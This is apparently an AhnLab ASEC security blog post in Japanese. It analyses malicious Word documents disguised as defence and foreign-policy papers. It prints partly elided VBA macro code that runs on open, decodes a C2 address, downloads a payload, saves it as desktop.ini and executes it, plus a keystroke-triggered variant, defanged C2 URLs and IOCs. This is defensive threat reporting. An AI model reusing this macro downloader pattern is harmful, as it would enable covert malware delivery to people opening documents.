ASEC 分析チームは、9月に特定の論文を利用した不正な Word ドキュメントが拡散したことを確認した。確認されたファイルは「経営革新理論から見た国防改革の方向.doc」という名前で出回っており、内部には不正なマクロが含まれている。内部のマクロコードは過去に共有された以下のファイルと類似した形式であり、すべて同じ攻撃者による仕業と推定される。
- 謝金支給依頼書(様式).doc (6月29日 ASEC ブログ)
- [** 夏季学術大会]_陽暦.doc (7月13日 ASEC ブログ)
- 経営革新理論から見た国防改革の方向.doc) (9/15)
- 2 中国の対外政策と米中関係の展望_安定期.dotm) (9/19)
- 極東問題研究所ナウマン財団学術会議企画案_発送用) (10/12)
9月に拡散が確認された Word ドキュメントの内容は、実際の<経営革新理論から見た国防改革の方向:軍構造および戦略体系改革を中心として>という論文と同じ内容で構成されている。この論文は、過去の「北朝鮮関連グループと推定される、PDF ドキュメントを利用した APT 攻撃」のスレッドで取り上げた「05_64-1 チョン・ヨンボン経営革新理論から見た国防改革の方向修正.pdf」と同じファイル名であることから推測すると、この攻撃者が同じ論文で様々な形式のマルウェアを製作しているものと見られる。
ファイルを開くと、内部に含まれている不正なマクロが実行され、このマクロコードは「夏季学術大会の略歴書式ファイルに偽装した Word ファイルによるマルウェアが拡散中」のスレッドで紹介した不正な Word ドキュメントのマクロと同じである。最近確認された「経営革新理論から見た国防改革の方向.doc」の Word ファイルに存在するマクロコードは、以下の通りである。
Dim qazwsx As Integer
Function sfjksfdgasdfhefgh(data)
On Error Resume Next
sfjksfdgasdfhefgh = afghhha(data)
End Function
<中略>
Sub AutoOpen()
On Error Resume Next
asfwqfasfsdafas
qazwsx = 0
ujmikl
End Sub
Function ujmikl()
On Error Resume Next
If (qazwsx = 0) Then
<中略>
ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
Set wob = CreateObject("wscript.shell")
drl = sfjksfdgasdfhefgh("[base64 でエンコードされた C2 アドレス]")
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", drl, False
WinHttpReq.send
If WinHttpReq.Status = 200 Then
gjhmksfghsdfgs ini, sfjksfdgasdfhefgh(WinHttpReq.responseText)
Set ExcelApp = CreateObject("Excel.Application")
str9 = sfjksfdgasdfhefgh("Y2FsbCgia2VybmVsMzIiLCAiV2luRXhlYyIsICJKRkoiLCAid3NjcmlwdCAvL2U6dmJzY3JpcHQgLy9iICIi") // call("kernel32", "WinExec", "JFJ", "wscript //e:vbscript //b ""
str11 = sfjksfdgasdfhefgh("IiIiLCA1KQ")
str11 = Left$(str11, InStr(str11, vbNullChar) - 1)
ini = Replace(ini, "\", "\\")
cmd = str9 + ini + str11
api = ExcelApp.ExecuteExcel4Macro(cmd)
Sleep 2000
DeleteFileA ini
End If
qazwsx = 1
End If
End Functionマクロコードの内部には、Base64 でエンコードされた C2 アドレスが存在する。経営革新理論から見た国防改革の方向.doc ファイルでは hxxp://n4028chu.mywebcommunity.org/d.php に接続し、受け取ったデータを %APPDATA%\desktop.ini ファイルに保存、および実行する。
このタイプのマルウェアは以下のように様々なファイル名で配布されている。
- 2 中国の対外政策と米中関係の展望_安定期.dotm (9/19)
- 極東問題研究所ナウマン財団学術会議企画案_発送用 (10/12)
上記ファイルのすべてに同一の不正なマクロが含まれており、以下のように「経営革新理論から見た国防改革の方向.doc」のマクロコードに、キー入力により不正な振る舞いを発現させるコードが追加された Word ドキュメントも存在する。追加されたコード以外の変数名、関数名等はすべて同じである。
Dim qazwsx As Integer
Function sfjksfdgasdfhefgh(data)
On Error Resume Next
sfjksfdgasdfhefgh = afghhha(data)
End Function
<中略>
Function ujmikl()
On Error Resume Next
If (qazwsx = 0) Then
<中略>
ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
Set wob = CreateObject("wscript.shell")
drl = sfjksfdgasdfhefgh("[base64 でエンコードされた C2 アドレス]")
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", drl, False
WinHttpReq.send
<中略>
Sub FLL()
Selection.TypeText Text:="a"
ujmikl
End Sub
Sub G9W()
Selection.TypeText Text:="b"
ujmikl
End Sub
Sub GEA()
Selection.TypeText Text:="c"
ujmikl
End Sub
<省略>以下は、同じマクロの内容で拡散する不正な Word ドキュメントから確認された C2 アドレスである。
- hxxp://0knw2300.mypressonline[.]com/d.php
- hxxp://hanjutour.atwebpages[.]com/d.php
- hxxp://n4028chu.atwebpages[.]com/d.php
- hxxp://23000knw.mypressonline[.]com/d.php
上記のように、不正な Word ドキュメントを利用した攻撃はいまだに行われ続けている。このタイプの不正なドキュメントはファイル内に実際の論文の内容等を含んでおり、ユーザーが不正なファイルであることを認知するのが困難なため、特別な注意が必要である。出どころが不明なファイルは開かないようにし、マクロを実行しないようにしなければならない。
現在 V3 では、このマルウェアを以下のように検知している。
[ファイル検知]
- Downloader/DOC.Agent
- Downloader/DOC.Generic.S1677
[IOC]
- 5eb09dd7aafdd5af5a8396497f99e0e7
- hxxp://n4028chu.mywebcommunity.org/d.php
- hxxp://0knw2300.mypressonline[.]com/d.php
- hxxp://hanjutour.atwebpages[.]com/d.php
- hxxp://n4028chu.atwebpages[.]com/d.php
- hxxp://23000knw.mypressonline[.]com/d.php
[関連ページ]
https://asec.ahnnlab.com/jp/26318/
https://asec.ahnlab.com/jp/24803/
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] 実行された VBS コードが攻撃者の C&C サーバーと通信する方式は、過去の ASEC ブログ(特定の論文の不正な Word ドキュメントを利用した APT 攻撃)を通じて紹介した内容と類似している。 […]